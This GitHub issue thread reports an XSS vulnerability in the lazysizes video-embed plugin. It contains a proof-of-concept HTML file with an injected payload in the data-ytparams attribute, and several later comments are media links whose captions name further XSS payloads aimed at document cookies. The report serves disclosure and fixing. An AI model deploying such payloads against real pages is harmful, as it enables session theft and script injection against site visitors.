### ISSUE TITLE
XSS vulnerability in video-embed plugin

### ISSUE THREAD

**Issue by koczkatamas** [aFarkas/lazysizes#764]
**Describe the bug**
The following attributes are not sanitized by the `video-embed` plugin: `data-vimeo`, `data-vimeoparams`, `data-youtube` and `data-ytparams` which may lead to XSS vulnerability.

**Affected source code**
The following lines contain the vulnerability:

- https://github.com/aFarkas/lazysizes/blob/a2f37ec2371bff523ea8b94800682e4ec3596b9b/plugins/video-embed/ls.video-embed.js#L73
- https://github.com/aFarkas/lazysizes/blob/a2f37ec2371bff523ea8b94800682e4ec3596b9b/plugins/video-embed/ls.video-embed.js#L98

**To Reproduce**
Open the following file and click on the `play` button:
```html
<html>
<head>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/lazysizes/5.2.0/lazysizes.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/lazysizes/5.2.0/plugins/video-embed/ls.video-embed.min.js"></script>
</head>
<body>
    <div class="ratio-16-9 lazyload" data-youtube="M7lc1UVf-VE" data-ytparams="&quot;&gt;&lt;/iframe&gt;&lt;img src=x onerror=alert(1)&gt;">
        <button class="play-btn">play</button>
    </div>    
</body>
</html>
```

**What is the expected behavior**
No XSS vulnerability.

**What happened instead**
`alert(1)` popup was shown, so the code embedded into the `data-ytparams` attribute ran.

**Similar issues**
This was a somewhat similar issue in jQuery UI which was handled as a security vulnerability and also got a CVE: https://github.com/jquery/api.jqueryui.com/issues/281

**In what environment (browser/device etc.) does this bug happen/not happen:**
Affects all environments, but tested in `Chrome 80.0.3987.132 (Official Build) (64-bit)` on `Windows 10`

**Comment by ahmedredhat** [comment]
![Uploading evilsvgfileA.svg…]()

**Comment by ahmedredhat** [comment]
https://github.com/aFarkas/lazysizes/assets/101028580/6bd0ed3b-683f-46e7-a1a8-e49deec87b57

**Comment by ahmedredhat** [comment]
![xss333](https://github.com/aFarkas/lazysizes/assets/101028580/48235c58-c99b-40e5-b6d2-6a73c9493dd6)

**Comment by ahmedredhat** [comment]
https://github.com/aFarkas/lazysizes/assets/101028580/4bf505d1-5b19-4286-83b4-51b481dad21a

![img src=x onerror=prompt(document cookie);](https://github.com/aFarkas/lazysizes/assets/101028580/f303ee74-c56c-4ae7-ba1a-cd7ee41ea04d)
![xss333](https://github.com/aFarkas/lazysizes/assets/101028580/f48eb8cc-8a6f-449f-b5e3-43d155cb1f57)
[xss333.svg.webm](https://github.com/aFarkas/lazysizes/assets/101028580/1fbad9f2-d062-482b-a7fd-11074de3ac06)

**Comment by ahmedredhat** [comment]
![iframe src=javascript:alert(document cookie) svg](https://github.com/aFarkas/lazysizes/assets/101028580/8f106524-a563-49e4-b00c-334fc3366763)
